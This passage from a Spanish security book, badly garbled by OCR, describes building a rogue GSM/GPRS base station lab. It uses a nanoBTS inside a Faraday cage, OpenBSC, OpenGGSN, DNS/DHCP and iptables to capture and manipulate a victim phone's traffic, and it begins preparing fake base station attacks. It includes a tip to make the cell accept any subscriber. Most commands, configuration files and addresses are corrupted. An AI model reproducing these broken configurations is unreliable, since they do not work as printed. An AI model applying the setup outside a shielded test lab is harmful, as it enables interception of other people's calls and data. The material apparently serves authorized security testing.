cuando  sea  uecesano,  pura  manipuiaeión  de  Irárteo  proverueiite  de  otias  eoiieítiories,  como  pnedeu  ser  puntos  de  acceso 
nó-Fí  falsos,  por  ejemplo. 
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12.0.^:  CminpnTieiite=i  át  una  iiiA'asfiti  LLClura  baF.ada  sn  OpcfiBSC. 


Comenzando  por  ja  paríe  izquierda  de  la  figura,  el  dispositivo  víctima  deberá  ser  introducida  en 
la  jaula  de  taradaiK  En  el  interior  de  la  misma,  se  habrán  conectado  dos  antenas  (por  ejemplo 
las  propias  antenas  que  vienen  con  la  nanoBTS^)  en  seFidos  cnnectorcs  FíMA  de  dentro,  y  en  los 
correspondientes  conectores  del  exterior  de  la  caja  (también  SMA)  deberán  conectarse  sendos 
cablea  de  50  ohmios,  que  irán  conectados  en  su  otro  extremo  a  los  conectores  (también  SMA)  de 
transmisión  (TX)  y  recepción  (RX)  de  la  nanoBTS  (esquinas  iiircriores  izquici:da  y  derecha); 

La  estaeion  base  nímoBTS  se  alimenta  a  través  dcl  mismo  puerto  ethemet  por  el  que  se  comunicará 
con  el  PC.  Para  apoilar  esa  áliinentación  la  nanoBTS  viene  con  mi  Iransfoiniador  que  por  uii  lado 
se  coneLla  a  la  corriente  eléctrica  (220V  AC),  y  por  el  otro  Liene  dos  puertos  R  J45:  uno  etiquetado 
como  “B  TS'l  que  debe  conectarse  al  puerto  RJ45  de  la  nafioBTS  mediante  un  cable  ethemet  directo, 
y  oti'o  puerto  RJ45  etiquetado  como  'T  AN”,  que  deberá  conectarse  al  equipo  OpenBSC  mediante  un 
cable  ethemet  cruzado  (o  mediante  cables  direetus,  uLilizatido  un  hub  o  switeh  entre  ambos  equipos). 

En  el  equipo  Op^nBSC  deben  estar  instalados  OpenBSC,  OpcmGGSN  y  ChmoSOSN,  y  todas  sus 
dependencias,  que  ya  han  sido  comentadas  anterionnente.  La  tarjeta  etiiemet  adicional  del  equipo 
OpenBSC  deberá  estar  conectada  al  equipo  de  nmni  pul  ación  de  tráfico,  mediante  ethemet  utilizando 
un  cable  eru/ado  (o  cables  directos,  utilizando  im  hub  o  switch  entre  ambos  equipos). 

En  el  equipo  de  manipulación  se  habrá  instalado  el  software  de  captura  y  manipulación  de  tráfico 
deseado,  como  por  ejemplo  IPtables,  dnsmctsq,  MetaspiolL  Wires^hark,  y  otios. 

El  equipo  de  manipulación  deberá  disponer  además  de  una  conexión  a  Irtemet  mediarte  un  camino 
que  TIO  pase  por  el  equipo  OpmBSC.  Por  ejemplo,  podría  tener  tina  tarjeta  ethemet  adicional  y  tener 
esta  conectada  a  un  router.ADSL,  o  disponer  de  un  módem  USB  3Q  con  conexión  de  datos  a  Internet 
uiediaiile  3G. 

Adicional  mente,  y  de  manera  opcional,  si  además  de  los  datos  se  fuera  a  manipular  las  cíimunicaciones 
de  voz  y  SMS  serta  necesario  contar  con  un  servicio  de  VolP  a  través  de  Internet,  pro  poi  clonado 
por  algún  proveedor.  Esta  parte,  no  obslaTiüj,  queda  fuera  del  alcance  de  este  libro  y  por  Lanto  no  .se 
describirá  con  más  detalle. 
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I 

Natas  de  instalaciun  y  cu nñgu radón 

En  ühLl;  EiparUdo  hc  recocen  lus  nolüs  de  inslalaíjión  y  eonn^uracitm  pcrLiiienLLS  para  cada  ccHTipimcntc 
atendiendo  a  su  uso  específico  para  realizar  pruebas  de  doncepío.  La  instalación  y  configuración 
básicas  del  software,  así  como  iiistmcciones  para  su  uso  est-áii  recogidas  en  las  referencias  que  se 
aporian.  \ 

liií^talaclóii  de  prerrequi^itu^  software:  lilio^itioeore  y  libasnio-abi^ 

OpcviBSC  depende  de  dos  librerías,  iíbosmocore  y  libostfio-abís,  que  deben  ser  instaladas 
previamente.  En  las  siguientes  direcciones  pueden  encontrarse  las  uistmcciones  para  descargar, 
ctJTTipilaro  instalar  estas  libren  as: 

htíp  ://bb .  osm  ocú  m .  o  j^g/trac/wikiñihosmoc  ore 
-  hítp :  aúpen  B^C.  iKimo  com.  org/ti^ac/h  iog/Iibosm  o-ahis 

liiRtalación  de  C)peii(w(wSN 

OpenOOSN  es  una  implementación  de  un  GGSN  {Oaíe^vq}^  GBKS  Support  A'ocí'c),  Es  necesario 
para  el  enrut amiento  de  trafico  GPRSj  y  además  incluye  la  librería  iibgip,  que  es  necesaria  para  que 
después,  cuando  so  etjmpile  OpenBSC^  se  ineluya  en  la  compilación  el  eoTnponcnlc  osmo-sgsn,  que 
es  la  implemeiitaciórL  de  un  SGSN  incluida  en  OpenSSC. 

En  la  siguiente  dirección  se  puede  encontrar  más  iiitórmación  sobre  OpenGGSN,  incluyendo  enlaces 
para  su  descarga:  klípy'/OpenBSC.oA^jnocom.oí^/trac/wikz/OpenGGSN 


Nota:  Se  recomienda  descargar  el  software  usaítdo  gíi,  mejor  que  usar  los  ¿cirhalh 
disponibles* 


F1  proceso  de  caímpil ación  es  el  habitual:  autoreeonf -fi;  ./canj7.gure;  make:  make  insíaíí. 


1 1I  stal  ación  de  OpenRSC 

Eii  la  siguiente  dnecclóii  se  puede  obtener  información  sobre  OpenESC^  incluyendo  las  instíuccíoTies 
de  d c s c arga  de  1  i go  fuente :  h ttp://Op enBSC.  asmo com.  org/trac/wíkí/OpenBSC 


El  proceso  de  compilación  es  el  habitual:  auíoreconf  -/?,■  JcQnJjgwv:  make:  make  inskiIL 


Nota:  Para  permitir  que  el  SGSN  acepte  dar  servicio  a  cualquier  IMSl,  y  no  solo  a 
los  que  tengan  los  mismos  MCC  y  MNC  que  la  celda  que  se  emita,  puede  ser  nece- 
sari<3  revertir  el  siguiente  eommü  antes  de  compilar  OpenBSC:  eafe22ca72902H(]fca- 
0fBd31d70239fd0b0dbb9d 


Instalación  de  uml-ufílities 

El  paquete  uml-utilites  proporciona  la  posibilidad  de  crear  inteiiáces  de  red  de  loopback  adicionales 
(aparLe  dcl  iiilerlaz  'fio’*).  Dichos  inicrfaces  se  crean  con  el  comando  ''huiicíl”  y  reciben  nombres  con 
fonnato  "tapN"  donde  'W  es  un  numero  natural. 
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Se  recomienda  usar  nn  par  de  estos  interfaces  de  loopback  adicionales,  uno  pata  que  escuclie  en  él  el 
servicio  GGSN  iO^enOOSN),  y  otro  para  que  escuche  en  el  el  servicio  DNS  {dfismasq). 

La  instalación  del  pá^uete  uml-utiliLíes  se  puede  realizar  ejecutando: 

5  ud  c  ap  t  i  t  u  fl  ^  ir-  L  Vi  1  uir.l  -Utilities 

\ 

La  creación  y  configura cíoíTide  los  interfaces  de  red  adicionales  de  loorpback  (direcciones  T?,  etc,),  se 
puede  realizar  en  el  fichero /e¿cvjieíivork/ír!tú?f aces,  con  un  contenido  similar  a  este: 

f  inLc'jLÍd.c^y  :5)  file  lised  by  ifv:p(S)  and  ifduT^-ii  (B) 
a'ato  lo 

if^ce  lo  inet  Icaphaok 

#  ethG  -  Int.fírnoL, 

i  1 ac0  ethü  inet  ¿hep 

if  ethl  -  DHCP 
auto  tzLiiL 

i  face  echl  inel.  ;-;U-iLic 
address  10.10,10.1; 
ne  trr  a  o  k  2  b  b  .  2  5  5 . 2  5  5 , 0 

netvjoi^k  10  .  I  n  .  'I  D  .  ti 
broadeast  10,10,10.232 

#  -  BSC 
aut;c  ethl:l 

Itace  ethl:l  inet  static 
add'í-e L íJ .  1 Q  .  1 0  .  1 0 
ne tma  s  k  255.2  3.2 . 2  5  5 .  C 

íiotwork  IC.  10. 10,0 
brca^dcaat  10.10.10,255 

'I  :jLnl:2  -  $G5ií 
auto  e-.n  I  ; 

iface  ethl: 2  inet  atalic 
addreas  10.10,10.11 
.Tennaak  2.d5 . 2 55 . 255 , 0 

nsexork  10.10. 10.0 
trondease  10.10,10.255 


#  tapo  - 
auto  tapD 

__dcia  tai:C  ir.et  atatic 
addrenn  10. 11. 11.1 
ne  tmas  k  23  3.232.2 .5  5 . 0 
netvícrk  1 Q  .  1 1 . 11 . 0 
brn.n:]caí3t  lü.11,11.2  55 
pr e-up  / usr / np  í  i'i /  L  ui : ct  1  - 1  t ap 0 

4f  tan  I  -  DUS 
a-Jto  tapl 

Hace  t.apl  inet  static 
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addresa  1CM2.12-1 

netrii-^sk  255.2  5E  .255,C 

nétwcrk  10.12,12*0 

broadcast  10.12,12.255 

pre-üp  /uíjr/sbin/t’unctl  -t  tapl 

4  NOTCI;  network  10.13.12.0/24  r^servod  foi  CGSEl  clients 

Insta ladón  de  un  servidor  DNS  (ej.:  dnsniasq) 

Dmmasq  es  un  servidor  DNS  (y  DHCP  y  TFTP)  sencillo  que  puede  resolver  localinente  los  nombres 
que  encuentro  en  /^tc/hosts,  y  todas  las  demás  peticiones  de  resolución  de  nombres  las  envisrfá  a  im 
senddor  DNS  externo,  V 

Se  recomienda  su  uso  en  esLc  caso,  para  que  los  clientes  GPRS  siempre  ie  pregunten  a  él  !a¿ 
traducciones  DNS,  es  decir,  para  que  sea  su  servidor  DNS,  y  así  independizar  la  configuración  de 
los  equipos  clientes  GPRS,  que  les  será  proporcionada  píir  el  GGSN,  de  ia  configuración  de  red  del 
acceso  a  Inteniet  que  se  esté  usando  en  cada  momento.  Su  instalación  se  realiza  como  paquete: 

.siirio  aptituULí  install  dnsir^aaq  dnsmasq-utils 

Se  recomienda  configurarlo  para  que  solo  escuche  cu  un  interfaz  de  loopback  (ej.;  tapl)  y  no  ofrezca 
servicio  DHCP  ni  TFTP.  Para  ello,  se  puede  editar  el  fichero  /etc/dnsmasq.confy  descoinentar  las 

siguicnLes  lincas; 

í  niie  r  f  ne = t  ap  1 
no-dhep- inte  rf a  ee^tap 1 
'h'i  nd-j  n  líürfaccL'a 

Tnstalación  de  un  servidor  DHCP  (ej.:  dhepS-server) 

Las  BTS  mnoBTS  se  configurarán  en  un  paso  posterior  para  que  obtengan  su  dirección  IP  por 
DHCP.  Es  necesario  pues,  que  en  la  red  que  une  al  equipo  labg;im00  con  las  nanoBTS  exista  un 
servidor  DHCP  que  asigna  direcciones  a  las  nanoBTS.  En  este  paso  se  instala  un  servidor  DHCP  en 
el  propio  equipo  iab^amOO  y  se  configura  de  modo  que  solo  atienda  peticiones  en  el  interfaz  cLhl 
(tarjeta  de  red  adicional)  y  que  asigne  dinámicamente  direcciones  en  un  cierto  rango,  por  ejemplo 
10.10.10.80  a  10.10,10.89. 

La  instalación  de  dhcpJ-server  se  realiza  como  paquete: 

í^ptitede  iníji-áli  dlicp3 -server  _ 

Se  deberá  editar  los  ficheros  /eia/defauii/isc^dhcp^servey,  para  elegir  el  interfaz  de  red  en  el 
que  escuchará  el  servidor  DHCP,  y  el  fichero  /eJc/dhcp/dhcpdaonfl  para  configurar  el  rango  de 
direcciones  a  servir. 

IiistaTación  de  Asterisk  y  LCR 

LCR  y  ^isíerisk  serán  necesarios  solo  si  se  desea  cursar  tráfico  de  voz  al  exteiior,  o  manipularlo, 
con  el  laboratorio  basado  en  OpenUSC,  pero  dado  que  esta  sección  se  centra  ónicamente  en  la 
manipulación  de!  tráfico  de  datos,  no  se  incluyen  aquí  más  detalles  sobre  ellos. 
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Inicialización  de  la  estación  base  na  no  B  I  S 

Antes  de  poder  u Lili/ar  un  cqijipf.>  nanoBTS  por  primera  vez  (recién  salido  de  fábrica)  es  necesario 
inicial  izarlo.  Este  proceso  de  micialización  consiste  en  modificar  su  conrigunición  de  fábrica  para 
configmarie  al  menos  los  siguientes  2  parámetros : 


Parámetro 

Descripción 

Unir  II) 

Cadena  de  caracteres  alfaniiméricos  que  identifica  al  equipo  concreto. 
Cada  nanoBTS  debe  tener  un  ídentificadoi  de  unidad  diferente. 

El  valor  de  ^ste  campo  deíerjninará  en  la  configunidÓTi  de  OpenBSC  qué 
conrigaraeión  se  aplicará  a  cada  nanoBTS  en  tiempo  de  ejecución. 

Dirección  IP  del  BSC  con  el  que  debe  contactar  la  nanoBTS. 

Primary  OML  link  IP 

Una  vez  configurados  el  Unit  ID  y  el  Primaiy  OiXÍL  Ilnk  IP,  la  nanoBTS 
intentará  contactar  con  el  BSC  enviando  paquetes  TCP  al  puerto  3002  de 
la  dirección  IP  configurada  como  Frlmury  OML  link  ÍP. 

Para  1‘ealizar  esta  micialización,  el  soílvvare  OpenBSC  incluye  una  herramienta,  el  ejecutable 
'7/^dccÉ?.¥,v-eonfig'\  que  permite  configurar  los  valores  de  Uuit  ID  y  Primmy  OML  ¡mk  IP  de  los 
equipos  nanoBTS. 

Nota:  Más  información  sobre  este  proceso  de  Inicial  i /¿ici un  se  puede  consultar  en 
http  ;  //OpenBSC.  osma  coin.  org/tracM'  iki/nano  B  TS. 


Se  recomienda  consultar  la  ayuda  dc1  comando //^4ctrÉ?í¿-config  ejecutándolo  con  la  opción  help"\ 


A  modo  de  ejemplo,  para  configurar  una  íí¿zr?o¿r71S'para  que  tenga  ID  1 00 1  y  que  tenga  cornEi  dirección 
del  DSC  10.10.  lÜ. 10,  suponiendo  que  dicha  nunoBTShn  obtenido  la  dirección  IP  10.10.10.21  por 
DHCP,  habría  que  ejecutar  los  siguientes  comandos: 

ipaccess-config  -u  2001/3/0  -r  l  o .  l  0 ,  l  C.?-^ 
ipa._-.fjtíL^ü-30Jiiig  -o  10.10.10.10  -r  10.1 0.10.21 


(innfiguracióii  de  routiiig  y  firewall  (iptables) 

La  configuración  mínima  necesaria  de  IPíabhs  para  que  funcione  correctamente  el  enriitamiento  de 
paquetes  entre  todas  las  redes  intemas  y  hacia  Internet  consiste  en  habilitar  el  paiámetio  de  ¡cernel  / 
proc/sy>'s/mt/ípv4/f.p jom^ard  y  configurar  MASQUE ILADE  para  todos  los  paquetes  salientes  en  el 
intertáz  de  red  de  conexión  a  Internet  (elhO). 

Esta  configuración  sencilla  se  puede  guardar  en  un  que  se  utilizará  para 

arrancar  el  servicio  6^.  firewall,  como  se  describirá  más  adelante. 

El  contenido  completo  del  script  /usr/locai/b¡rí/síürS~fw  será: 
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i  I  /  h-í  n/íh 

fJcLrj  "" 

■'■^Coníiguring  iptables  “0  routs  GFES/EDGE  traffi",,. 

echo 

I,  Fl  nñh  everythir.g 


iptabl^s 

•t 

filuer 

F  Zlí^ZT 

iptublcu 

-L 

Jl-C'l 

-F  "NPUT  AGGKF" 

i  obaliles 

-t 

ñl-er 

-F  OUTFUT 

ipt ables 

t 

filuer 

-r  OUTrUT  ACCEPT 

ipLublcu 

-L 

n  te- 

-h'  KO^WAKI) 

ipT.abies 

-t 

filter 

-F  rO?;WAED  ACCFPT 

ipuabias 

t 

nat 

-F  PEEROUTIMC 

ipuübluü 

-L 

nal 

-  F  F  F*;  ROO  ■  1  1  N  í  -  AC  GE  P  T 

I  p  '.rtiblps 

-t 

nat 

”F  PGSTE0UTIN3 

ipuablea 

t 

nat 

■r  F0STA0UTIX3  ACCEPT 

ipuablí:^ 

-L 

nal 

-F  c‘j'r?:iT 

■  pr.ahlsfi 

-t 

nat 

-P  CUTP-JT  ACCEPF 

f  Er:¿ih_f_'  IP  ..  OfJíp^fard.lnq 

sohü  >  /prcc/sys/net/ipv4/ip_  forvjard 

#  EiiüJ-jlo  ’:-i7i.=  :jUE:R.ADK  on  Gi  int.Rrface 

iptablás  -c  nat  -A  FQSTROUTIISG  -O  sthC  j  KASQUERADE 

#  Show  final  configura  ti  cr, 
cono 

echo  TADLE  PILTEA  #######^^ 

iptabies  -n  -L  -v 
ocht;)  "" 

echo  TADEE  HAT  #######" 

iptabiec  -n  -L  -v  -t  iiat 

echo 

echo 

echo  "Dcr.e  . " 

Confii^uradúii  del  ser\icio  GGSN  (opcnggsn) 

El  código  tiiente  de  OpCfiGGSN  incluye  un  ejemplo  de  fichero  de  configLiración  (ggxn.conf}  en  el 
siihdircc  Lorio  examples- 

Para  establecer  la  configiiraciím  de  Opt^nGOSN  s^^  puede  copiar  inicialmente  ese  fichero  al  directorio 
apropiado  (por  ejemplo  /etc/opt/QpenGGSAk)  y  editar  dicha  copia  pam  establecer  la  configuración 
deseada. 

Los  parámetros  principales  a  configLirar  son  la  dirección  IP  en  la  que  escuchará  el  üCJSN  (lisíej?),  el 
rango  de  direcciones  de  red  a  asignar  a  los  clientes  GPRS  (¿fympX  y  el  servidor  DNS  a  asignar  a  los 
clientes  GPRS  (peod^iyj). 

La  siguiente  salida  dcl  comando  dipl  coiiiparaiido  uii  fichero  de  configuración  antes  (.orig)  y  después 
de  ser  editado,  muestran  los  cambios  sugeridos  sobre  el  fichero  de  configuración  de  ejemplo: 
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root  0 1  Rbrjí:i[i  JC' : /e  „c/ opt/ggSHtt  ■±Lff  g'::72=:ri .  cin-nf .  nriq  rjy^ii  conf 
lOclO 
< 

>  fg 

l^cl^ 

<  Jdijb.ii;: 


>  debug 

<  #p  i  dfi”  e  /  un  /  Lj  íj  Lí  n  .  pid 

_ 

>  p-idfile  /■M'ri.r/oiJ t/ggsn/ggsn»pid. 
30c30 

<  #3ta-elir  /var/lib/gg5>n/ 

>  S  ta tedir  /  va r  / r: p  .  / yg n/ 

3  5  c  5  5 

<  JÍ1  i^jLen  lU  .ü.0.2  40 

>  listen  10.11.11.1 
iOc^lO 

<  #net  132  ,  iCfi  .  0  .  n/2¿t 

>  net.  0,:3.13.C/24 
57c:57 

■C  #dynip  192 . 1  .  0 , 0/2  4 

>  dy n 1 p  1 0  *13,13.0/24 
57cS^ 

<  #£.ic.üdn3l  0  .  C  .  0 . 0 

>  pccdnsl  10,12.12.  : 

•'  (.]  rj  L  0 1  ¿ib-  g  3 jT.O  0  í  /  e  t  c  /  op  t  /  gg  í  n  f 


Cftiifiguradóii  del  ííervício  SGSN  (osmo-sgsn) 

OpcfiBSC  incluye  un  ejemplo  de  fichero  de  configuración  para  üsmo-sgsn^  que  se  instala  como  /opt/ 
OpenB  S  C/í  harE/dorJOpenBSC/exampl es/osm  t}-:ígs  n/o.^mo-sgsn,  cfg. 

Para  establecer  la  configuración  de  tómfj-.vg.vn  se  puede  copiar  iniciaimente  ese  fichero  al  directorio 
apropiado  (por  ejemplo  /^ic/opt/OpenBSC/)  y  editar  dicha  copia  para  establecer  la  configuración 
deseada. 

La  siguiente  salida  del  comando  dtjf,  comparando  un  fichero  de  configuración  antes  (.ongj  y  tlcspucs 
de  ser  editado,  itiuestiaii  los  cambios  sugeridos  sobre  el  fichero  de  configuración  de  ejemplo: 

1  :  /  g te/ opt/  op^nj^sc#  dif £  OL^iio"Rq.=]n  ,  cfg  .  urig  osino  3'^sn  .  cf cr 

9, 10c9.10 

<  gtp  local  ip  10.23,23.22 

<  qqari  0  l  ciuc  Lg -ip  132.108.0.101 
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>  gtp 

>  gfjof  0  ''rvnofb'^.-i  p  '.0.11.11.1 
21,22^21,22 

<^.  sncap^ulatioii  Lidp  Icrjal-ip  j  í?  ,  i  R  .  0 , 1 0 1 
<  :j  11  f.'  p  -n  j  1  1. 1  -ju  udp  1  o  cal  -pe  r  “  23000 

>  sncapsulati^jn  cdi-’  lcr_'.¿i_-ip  lÜ.lG.in.ll 

>  1 1  I  ^  I .  i  L'jii  iidp  Iccal-poirt  23C11 
r  o  c  t.  0 1  a t  gsrr.  C  0  í  /  e  t  c  /  Op  c  /  op  e  nb  s  c  fi= 


La  entrada  ‘‘gtp  locaLip’’  es  la  dirección  IP  local  en  la  que  escuch^p&psmo-sgsn. 

T  ^  entrada  ‘‘ggsn  0  reniote-ip'-  es  la  dilección  IP  del  GGSN,  a  la  cnal  se  conectará  osmo-sgsn. 


Las  dos  direcciones  IR  la  tiel  SGSN  y  la  del  GGSN,  deben  ser  distintas  incluao  si  ambos  procesos 
se  ejecutan  en  el  mismo  equipo. 

í.as  cii [radas  “eiicapsulation'’'  deben  especiticar  la  dirección  IP  y  pnerLo  de]  SGSN  tal  cual  serán 
vistos  desde  la  RTS.  Puede  coincidir  con  la  IP  especificada  en  “gtp  local-ip‘'  si  no  hay  NAT  entre  la 
BTSyelSGSN. 


Nota:  Ln  la  sigiiieme  dirección  se  puede  encontrar  más  información  sobre  estos  pará¬ 
metros  de  CDiiñgiiración:  http://OpenBSC,  osmocom.Qrg/tracJwiki/Opei^SC^PRS. 


Configuración  del  servido  BSC  (openbsc:  oíiirin-nitb) 

OpenESC  incluye  varios  ejemplos  de  ficheros  de  configuración  para  los  distinlo^  mtidos  de  operación 
de  OpenBSC^  que  se  instalan  /opt/OpenBSC/shcire/doc/OpenBSC/examples. 

Para  establecer  la  configuración  de  OpenBSC  {osmo-nlib)  se  puede  copiar  inicialmente  el  fichero 
OpenBSCxíg  coiTespondiente  al  modo  de  ñmeionamiento  osmo-nith  con  BTS  nanoBTS,  /opt/ 
OpenBSCJs  h¿ire/doc/OpenBSC/examp¡es/osm  o-nhb/nanoB  TS/OpenDSC.  cfg,  al  d  irectori  o  apropi  adí  j 
(por  ejemplo  /etc/opt/OpenBSCj  y  editar  dicha  copia  para  estable cei'  la  coiiíigui ación  deseada.  Los 
principales  parámetros  que  se  recomienda  modificar  (algunos  es  imprescindible  hacerlo)  son: 


Farámctio 

Üescripdón 

shorl  ñame 

Nombre  corto  que  publicará  la  celda 

1  ¡ong  ñame 

Nombre  largo  que  publicará  la  celda 

baná 

Banda  en  la  que  ir  abajará  la  nanoBTS.  Debe  ser  GSM900  o 
DCSl  800,  y  debe  reflejar  la  banda  de  la  nanoBTB  utilizada. 

íp.access  vnii id 

Ideiitificador asignado  a  la  ??o«oiííS' durante  su  inicializacicm 

gprs  * 

Conjunto  de  parámetros  que  definen  la  configuración  GFKS 
de  la  nanoBTS.  A  continuación  se  explican  algunos  con  más 
deialle, 
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Parámetro 

Descripción 

mode  egprs 

Activa  e¡  modo  Kdge. 

gprs  mvc  0  local  udp  port  23000 

Selecciona  el  pueito  UD?  que  uLÍlixará  la  nonoñTS  para 
eomuTiicarstí  c<in  el  SGSN.  En  este  caso  23ÜÜ0, 

gprs  mvc  0  i^emote  udp  port  23011 

Puerto  UDP  del  servicio  SGSN  de  cara  a  la  nanoETS.  En 
este  ejemplo  23011. 

gprs  nsve  0  remóte  ip  ¡0. 10.  !0Jt 

Dirección  IP  dcl  ser\dcio  SGSN  de  cara  a  la  nanoBt'S.  En 
este  ejemplo,  10.10.10,11. 

arfen 

ARFCN  en  el  que  emitirá  la  tmnoETS. 

1 

pln^s  chan  configFDCÍl 

El  valor  PDCli  en  lugar  de  TCH/F  indica  que  ese  tíme  slot 
se  dedicará  a  tráfico  GPRS  en  lugar  de  tráfico  de  vo7.  Se 
recomienda  dedicar  varios  time  sloTS  a  tráfico  GPRS. 

Nota;  En  la  siguíenlju  dirccciión  se  puede  encontrar  más  información  sobre  estos  para- 
metros  de  configuración;  htíp://OpenBÜC,osmocom.org/íraam¡d/OpenBSC_GPRS. 


La  siguíenLc  salida  del  comando  diff]  comparando  un  fichero  de  configLaacióii  antes  (*orig)  y  después 
de  ser  editado,  muestran  los  cambios  sugeridos  sobre  el  fichero  de  eí>nfiguracinTi  de  ejemplo: 

rco“  JlabgñnO o  : /■Rtí';/ript /opcriLbíJc#  diff  -rupM  openbsc  .  cfg  . orig  oper.bsc.cfg 

- openbsc  ,cfg.  ^rig  [times “arap] 

++  -I-  r;:  f)  e.  b  .  c  i  y  |  L  li  1 1 íí  1 3.mp  ] 

a  -11^3  -i-llr3  0^1  e'_irpi]r. 

netvork 

reLiA^OL'k  crjuiiLry  cüde  1 
nohile  ri'Stwcrk  enrié 

-  shcrt  r.arr.s  OpenDSC 

-  -üiiy  íJdLiLc:  Ox-’eaBSC 

+  «hort.  r.F.me  testpher  . 
t  long  ñame  tettlong 

ciLL_ii 

Inn^t.ion  nprlatrirq  rciooL  ClULllíe!  13  _ 

er.cryption  a5  0 
l¿@  ^3  9,  D  +3  3^.3  (^0  network 
tiQier  t.ll'll  n 
hts  C 

type  naricb-a 

.XXX  -  Unooii  ricnL  Llie  c-ppropr late  bar.d  ÍGSbí900,  DCGlOOÜ) 

.bar.d  G3KS0Q 
^■criiCi.  DC  S 1 8  ü  0 
r:  el"  S  iri  C-  n  I.  i  L  y  0 
loGaticri_area_code  1 
M  -50,11  +52,2  3  net^JOrk 
f:  V.  a  -I  ne  1  ,h  '  \  a :  a  1.  o  i\  <j  o  iid  i  ng 
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rach  t'A  ir.teg'er  3 

rc'icli  ííiax  t rarsírisaion  7 

ip.access  1031  3 

.7XX  -  TjDc:ojr.Tie:it  the  appropriate  unit  I-  ( 2C  01=GSM90C ,  2  002=DCS1&0  3  j 

-  . ip , a  c  ae  a  f  m  r i t  t  d  2  30  7  0 
ip.accsss  uaii“_id  2  0  31  3 

oml  ip.acceas  atream  id  255  line  0 

gpL'-i  mc'dc  novo 

gpr£  íc.oá^  ogprs 

gprs  routing  are a  0 

gprE  cüll  bvci  2 

-  gpL"s  risei  131 

-  gpíre  ü  navci  lül 

g  p  r  F  f  F  \T  n  0  1  n  a  f  1  \]  di:'  yj  o t  23  C  0  0 

-  qpt"F  "iRvr  0  rí*Tr.r?-=  iir'p  porf  23  011 
gprs  as  ve  0  reiTioee  ip  lC.lC.lC.il 

tSA  Ü 

-f__l  (iriled  3 

i XXX-  Select  ARJCW.  Note: 

I  ARFCWa  yüOMHZ;  1  124  íe.g.  5) 

i  AHh'tNa  tñnOMHX;  5  I  2’-3fí5  51<l) 

arfen  514 
no:[ii:3Eil  pover  23 
cíi  a  x_v  awe  r  _r  e  d  2  0 
-63,13  f32^10  í!0  network 
timeslct  3 

pliY^  '."Jian  oonfiq  'l''2H/F 

time Slot  4 

phys  chan  confíg  T'CH/F 
-t-  ptiys  chan  confiq"  PDílH 

timeslct  5 

£.4 1  y  L a í i_<j o i üig  T C H /  F 

phy£_chan_cionfig  RDCH 
timeslct  É 

píiyF^_ciian_oonlig  TCH/F 
phys^chan^oonfiq  tüCN 
timeslct  7 

phys  chan  confíg  T'CII/F 
■r  pliyF._c.han_coiilig  FDCH 

roct01abgssn3O  I  /0rc/oph/oper.hño4  # 

Provisionamiento  de  usuarios 

El  provisionamicnlo  dü  usuarios,  es  decir,  configurar  que  usuarios  (IMST)  móvilc.s  podrán  conectarse 
y  cuáles  no,  se  describe  más  adelante,  en  la  sección  dedicada  a  la  manipulación  de  conranicaciones 
GPRS/Etige. 
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3.  Manipulación  de  comunicaciones  GSM  (voz  y 
SMS) 


Preparación  de  la  infraestructura  para  pruebas  de  ataque  con 
estación  base  falsa 

Una  vez  insta líi da  la  infraestructura  descrita  antenonnente,  el  siguiente  pasn  es  p<mer  en  nnarcha  el 
ataque  con  estación  base  íálsa  GSM,  del  que  se  supone  ai  lector  conocimientos  de  cómo  ñinciona’^. 

Para  poder  exponer  ejemplos  concretos,  supóngase  que  la  inltaestmcUira  conñgurada  está  basada  en 
OpcnBTS  2.8^  ÜSK.P  (cuaíquíer  modelo  soportado)  con  2  taijetas  hija  configtiradas  para  emitir  en 
la  banda  de  900  MHz  +  {Real  TimeY^,  Se  supone  que  la  USRP  está  conectameiite  instalada 

y  configiiradH  en  este  punto,  así  como  el  software  OpenBTS,  Asterisky  eonngurneiorjes  correctas 
para  tuncioiiar  juntos*  todo  ello  siguiendo  las  instnicciones  que  se  han  aportado  en  las  referencias. 

Por  claridad  en  la  exposición  de  los  conceptos,  las  conñguraciones  presentadas  sqn  las  mínimas 
ncccsanas  para  que  funcionen  las  pruebas  de  concepto  de  los  ataques  y  no  se  ha  incluido  contenido 
que  haría  más  estable  la  infraestrueliira,  como  por  ejemplo: 

-  Respuesta  ante  extensiones  no  existentes. 

-  Automatización  en  la  configuración  de  OpenBTS. 

Llnifieación  en  la  configuración  de  Astffriyk  de  fonna  que  lodos  h>s  alnques  csLóti 
implementados  y  se  activeii/desactiven  mediante  un  mecanismo  sencillo. 

-  Autoiiiatización  en  la  configuración  de  Asíerisk. 

Conexión  de  la  estación  base  a  la  jaula 

La  eoTiexión  de  la  estación  base  a  la  jaula  se  realizará  mediante  cables  RF  a  los  coiiectores  blindados 
(típicamente  del  tipo  SMA)  de  la  jaula.  En  e!  interior  de  la  jaula,  esos  eonectores  deberán  estar 
conectados  a  una  antena  cada  uno,  cuyo  único  requisito  será  que  tenga  la  misma  ímpedancia  que  la 
USRP  (.59  fl).  Se  ubicará  el  terminal  víctima  dentro  de  la  jaula  y  so  cerrará  la  jaula. 


Preparación  previa  de  asterisk 

Partiendo  de  la  configuración  básica  (sfp.coiff  y  suministrada  cííti  OpeuBTS  2R 

(en  el  directorio  Asterisk  config)  se  construirá  una  configuración  de  Asterisk  con  los  siguientes 
objetivoK^^: 

-  Minimizar  las  diferencias  de  configuración  para  OpejiHTS  2.6  y  OpE}2HTR  2.8. 

1 7  ht!L'í¡^://www.  dcpc.on.Ofg/hímíMmk6-/dc  arr^hh^es/dc-  i8-ari'hrv(i.híTnltíPügfít 

1 8  Aunque  suponemos  una  infraestructura  concreta  del  atacante*  todos  los  ataques  tuncionajlan  de  forma  análioga  con  otius 
versiones  de  la  míracslrucLura  simplemente  cambiando  iLlgujiyi?  pructídlmitíiiloii  de  cüiifi^LiiucióiL 

19  Se  presupone  ál  léetor  eon  ooí  mi  en  tos  básiooíi  de  confígijracrón  de 
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Hacer  que  la  coristrucciÓTi  de  la  cüiiriguiacióu  guíe  al  lector  para  entender  los  objetivos 
de  cada  paso. 

Simplificara!  máximo  la  configuración  íncltiyeiido  solo  aquel  los  elementos  imprescLndibies 
para  realizar  las  demos  trac  i  oí  íes  de  los  ataques. 

Tn?^ta1acirin  de  un  teléfono  de  ataque 

Para  que  el  atacante  pueda  disponer  de  teléfonos  con  los  que  comiraicar  por  GSM  es  necesario  tener 
teléfonos  registrados  en  su  infraestructura.  Existen  2  modos  de  hacerlo: 

Teléfonos  GSM  registrados  en  la  estación  base  (eu  el  caso  de  las  pruebas  de  concepto 
deberían  estar  dentro,  o  bien  tener  st3  antena  dentro  de  la  jaula  de  Fai'aday  )^ 

